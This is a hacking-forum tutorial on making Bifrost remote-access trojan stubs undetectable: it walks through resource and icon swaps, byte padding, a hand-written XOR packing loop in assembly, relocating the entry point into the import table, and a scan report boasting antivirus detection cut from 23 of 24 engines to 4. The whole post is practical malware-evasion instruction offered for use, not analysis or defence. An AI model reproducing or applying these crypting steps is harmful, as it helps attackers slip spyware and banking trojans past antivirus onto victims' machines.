How to undetect Bifrost stubs the manual way by haZl0oh !

Ok guys ....

first of all ya need following tools/stuff...

- Reshacker
- Some icon of your choose
- some handy hexeditor ( your favourite )
- Some example PE file ( i choosed the bifrost client )


in this example i took the bifrost 1.2d stub
novirusthx scan
was 23/24





1. change the icon

take reshacker and drag and drop your stub file into it.
goto icon group ressource and open it ...

change the icon to your favourite one
( better take one who isn´t often seen in malware )

save it and step one is done....

2. open your pe file you choose ... in my case bifrost client
put this into reshacker and save your version info ressource
to a file...

now close reshacker open it again an drag n drop your stub into it again....


now action >>>> add a new ressoure

open your saved version info ressource

ressource type : version info
ressource name : 1
ressource language : 1033


save it ... done


3.
add a visual maniferst into your stub
do it with tools w2ho are abled to or do it again with resshacker ( by the way ...awesome tool like ya see ...lol)

now when ya added your visual manifest


4.

add some bytes with your hexeditor
i gave 200 bytes @ the end of file .....
works for my choose yaself

i also changed the 00 from offset 230 till 3ff to 11....

now after all these things the heavyest step comes ....
lol

maybe ...


MANUAL Packing & EP Moving!!!


5.


some days ago i drove by car and badabang .. i had an idea
why dont xor a file from back to start ?!?!?!?
i tried and it worked for me....


Code:
so my code is very easy :

( call it a beginner code )


xor bl,bl
mov esi, "end address of the code are you want to pack" 
dec bl
xor byte ptr ds:[esi],bl   <<<< ****
dec esi
cmp esi, " start adress of the code ya wanna pack"
JGE "address of xor byte ptr ds:[eax],bl"  ****
call "address of real OEP"
ret
now move your new ep into the image import descriptor range

it looks like these here:



========================================


00407D90 . CC7D0000 DD 00007DCC ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407D94 > $ B8 AA7E4000 MOV EAX,jmp_eax_.00407EAA <<<< my EP
00407D99 ? FFE0 JMP EAX
00407D9B ? 90 NOP
00407D9C . 2E7E0000 DD 00007E2E
00407DA0 . 00100000 DD 00001000
00407DA4 . F07D0000 DD 00007DF0 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DA8 . 00000000 DD 00000000
00407DAC . 00000000 DD 00000000
00407DB0 . 4A7E0000 DD 00007E4A
00407DB4 . 24100000 DD 00001024
00407DB8 . 00000000 DD 00000000 ; Struct 'IMAGE_IMPORT_DESCRIPTOR'
00407DBC . 00000000 DD 00000000
00407DC0 . 00000000 DD 00000000
00407DC4 . 00000000 DD 00000000
00407DC8 . 00000000 DD 00000000

======================================


run your xor code and then save your new UD stub !!!

now plce the entrypoint in lord pe to the place where YOU placed ya NEW EP
my one was here "00407D94"


and it´s done with these easy steps your stub is almost to any AV undetected
i scanned my one and it was ..:


File Info

Report generated: 24.1.2009 at 23.27.26 (GMT 1)
Filename: 123.exe
File size: 80 KB
MD5 Hash: 980763A46F83883B1CAD7558411A5557
SHA1 Hash: B927C0FDA27210C59F366F2167866832B0430374
Packer detected: PEncrypt 3.1 Final -> junkcode [Overlay]
Self-Extract Archive: Nothing found
Binder Detector: Nothing found
Detection rate: 4 on 24

Detections

a-squared - Nothing found!
Avira AntiVir - Nothing found!
Avast - Nothing found!
AVG - Nothing found!
BitDefender - GenPack:RAT.Spy.Banker.AAUT
ClamAV - Nothing found!
Comodo - Nothing found!
Dr.Web - Nothing found!
Ewido - Nothing found!
F-PROT 6 - W32/Midgare.A.gen!Eldorado
G DATA - Nothing found!
IkarusT3 - Nothing found!
Kaspersky - Nothing found!
McAfee - Nothing found!
MHR (Malware Hash Registry) - Nothing found!
NOD32 v3 - Win32/Bifrose.NFJ
Norman - Nothing found!
Panda - Nothing found!
Quick Heal - Nothing found!
Solo Antivirus - Nothing found!
Sophos - Nothing found!
TrendMicro - Nothing found!
VBA32 - RAT.Win32.Midgare.hhn
Virus Buster - Nothing found!

Scan report generated by
NoVirusThanks.org



I won´t post my stub here coz i want the users to test it by them self !

If ya like it gimme some thx or Reputation ....